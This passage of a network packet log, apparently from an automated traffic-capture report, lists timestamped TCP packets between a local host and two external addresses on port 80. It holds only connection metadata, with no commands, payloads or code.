                                            Nov 12, 2024 11:19:48.242201090 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.242212057 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.242213964 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.242218018 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.242228031 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.242235899 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.242243052 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.242247105 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.242254019 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.242255926 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.242269039 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.242280960 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.242281914 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.242290020 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.242292881 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.242302895 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.242309093 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.242311954 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.242328882 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.242330074 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.242340088 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.242345095 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.242357969 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.242362976 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.242372036 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.242393970 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.242399931 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.242407084 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.242419004 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.242427111 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.242433071 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.242440939 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.242451906 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.242455959 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.242464066 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.242465973 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.242477894 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.242500067 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.242506981 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.242562056 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.242671967 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.242683887 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.242696047 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.242707968 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.242716074 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.242722034 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.242733955 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.242738008 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.242750883 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.242753983 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.242758036 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.242768049 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.242780924 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.242789030 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.242794037 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.242794991 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.242813110 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.242824078 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.242882967 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.242902040 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.242944956 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.243020058 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.243036985 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.243050098 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.243060112 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.243062019 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.243068933 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.243072987 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.243087053 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.243088961 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.243096113 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.243100882 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.243110895 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.243120909 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.243129015 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.243145943 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.243175983 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.243187904 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.243199110 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.243208885 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.243218899 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.243238926 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.243263960 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.243277073 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.243288040 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.243299961 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.243304014 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.243319035 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.243328094 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.243350029 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.243361950 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.243372917 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.243381977 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.243385077 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.243391037 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.243393898 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.243407011 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.243415117 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.243418932 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.243422031 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.243432045 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.243437052 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.243446112 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.243449926 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.243459940 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.243462086 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.243473053 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.243484974 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.243520021 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.290724039 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.290739059 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.290750980 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.290762901 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.290776968 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.290785074 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.290785074 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.290798903 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.290798903 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.290811062 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.290821075 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.290826082 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.290833950 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.290847063 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.290858030 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.290858030 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.290870905 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.290874958 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.290878057 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.290888071 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.290891886 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.290923119 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.290923119 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.291178942 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.356827021 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.356870890 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.356977940 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.356996059 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357011080 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357016087 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357031107 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357037067 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357045889 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357050896 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357059002 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357069016 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357075930 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357081890 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357084036 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357095003 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357095957 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357110023 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357115984 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357120991 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357129097 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357132912 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357146025 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357153893 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357156038 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357167006 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357172012 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357182026 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357183933 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357192039 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357194901 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357211113 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357218027 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357227087 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357227087 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357232094 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357249975 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357260942 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357263088 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357263088 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357271910 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357283115 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357285023 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357297897 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357301950 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357306004 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357315063 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357319117 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357327938 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357331038 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357338905 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357352018 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357356071 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357363939 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357372046 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357372999 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357384920 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357394934 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357395887 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357409000 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357409954 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357419968 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357420921 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357431889 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357439041 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357445955 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357455015 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357456923 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357466936 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357481003 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357491016 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357500076 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357502937 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357511044 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357518911 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357532024 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357532024 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357534885 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357556105 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357566118 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357566118 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357568026 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357579947 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357592106 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357598066 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357599974 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357609987 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357620955 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357625961 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357635021 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357637882 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357665062 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357665062 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357682943 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357696056 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357707024 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357723951 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357736111 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357743025 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357748032 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357760906 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357765913 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357780933 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357804060 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357806921 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357839108 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357851028 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357861996 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357866049 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357877016 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357889891 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357916117 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357925892 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357935905 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357948065 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357952118 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357959986 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.357965946 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357973099 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.357983112 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.358035088 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.358067989 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.358165026 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.358174086 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.358186007 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.358196974 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.358206987 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.358208895 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.358216047 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.358218908 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.358232975 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.358233929 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.358241081 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.358247042 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.358253956 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.358258009 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.358273983 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.358297110 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.358305931 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.358318090 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.358329058 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.358345985 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.358351946 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.358356953 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.358360052 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.358367920 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.358378887 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.358382940 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.358395100 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.358398914 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.358406067 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.358407021 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.358417988 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.358422041 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.358429909 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.358439922 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.358447075 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.358467102 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.358470917 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.358521938 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.358521938 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.358562946 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.358572960 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.358583927 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.358594894 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.358596087 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.358603954 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.358612061 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.358622074 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.358629942 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.358639956 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.358647108 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.358650923 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.358654976 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.358663082 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.358674049 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.358678102 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.358689070 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.358702898 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.358716011 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.358745098 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.358783007 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.358783007 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.358794928 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.358805895 CET804916645.33.6.223192.168.2.22
                                            Nov 12, 2024 11:19:48.358815908 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.358823061 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:48.358843088 CET4916680192.168.2.2245.33.6.223
                                            Nov 12, 2024 11:19:57.521442890 CET4916780192.168.2.2215.197.148.33
                                            Nov 12, 2024 11:19:57.527964115 CET804916715.197.148.33192.168.2.22
                                            Nov 12, 2024 11:19:57.528039932 CET4916780192.168.2.2215.197.148.33
                                            Nov 12, 2024 11:19:57.543263912 CET4916780192.168.2.2215.197.148.33
                                            Nov 12, 2024 11:19:57.548163891 CET804916715.197.148.33192.168.2.22
                                            Nov 12, 2024 11:19:57.548221111 CET4916780192.168.2.2215.197.148.33
                                            Nov 12, 2024 11:19:57.548228979 CET804916715.197.148.33192.168.2.22
                                            Nov 12, 2024 11:19:57.553031921 CET804916715.197.148.33192.168.2.22
                                            Nov 12, 2024 11:19:58.145618916 CET804916715.197.148.33192.168.2.22
                                            Nov 12, 2024 11:19:58.145677090 CET4916780192.168.2.2215.197.148.33
                                            Nov 12, 2024 11:19:59.050743103 CET4916780192.168.2.2215.197.148.33
                                            Nov 12, 2024 11:19:59.055679083 CET804916715.197.148.33192.168.2.22
                                            Nov 12, 2024 11:20:00.067711115 CET4916880192.168.2.2215.197.148.33
                                            Nov 12, 2024 11:20:00.072712898 CET804916815.197.148.33192.168.2.22
                                            Nov 12, 2024 11:20:00.072803020 CET4916880192.168.2.2215.197.148.33
                                            Nov 12, 2024 11:20:00.084325075 CET4916880192.168.2.2215.197.148.33
                                            Nov 12, 2024 11:20:00.089323044 CET804916815.197.148.33192.168.2.22
                                            Nov 12, 2024 11:20:00.711504936 CET804916815.197.148.33192.168.2.22
                                            Nov 12, 2024 11:20:00.711577892 CET4916880192.168.2.2215.197.148.33
                                            Nov 12, 2024 11:20:01.593543053 CET4916880192.168.2.2215.197.148.33
                                            Nov 12, 2024 11:20:01.598447084 CET804916815.197.148.33192.168.2.22
                                            Nov 12, 2024 11:20:02.610441923 CET4916980192.168.2.2215.197.148.33
                                            Nov 12, 2024 11:20:02.615700006 CET804916915.197.148.33192.168.2.22
                                            Nov 12, 2024 11:20:02.615797043 CET4916980192.168.2.2215.197.148.33
                                            Nov 12, 2024 11:20:02.626880884 CET4916980192.168.2.2215.197.148.33
                                            Nov 12, 2024 11:20:02.631819963 CET804916915.197.148.33192.168.2.22
                                            Nov 12, 2024 11:20:02.631880045 CET4916980192.168.2.2215.197.148.33
                                            Nov 12, 2024 11:20:02.631932020 CET804916915.197.148.33192.168.2.22
                                            Nov 12, 2024 11:20:02.636970997 CET804916915.197.148.33192.168.2.22
                                            Nov 12, 2024 11:20:02.636981010 CET804916915.197.148.33192.168.2.22
                                            Nov 12, 2024 11:20:03.250433922 CET804916915.197.148.33192.168.2.22
                                            Nov 12, 2024 11:20:03.250516891 CET4916980192.168.2.2215.197.148.33
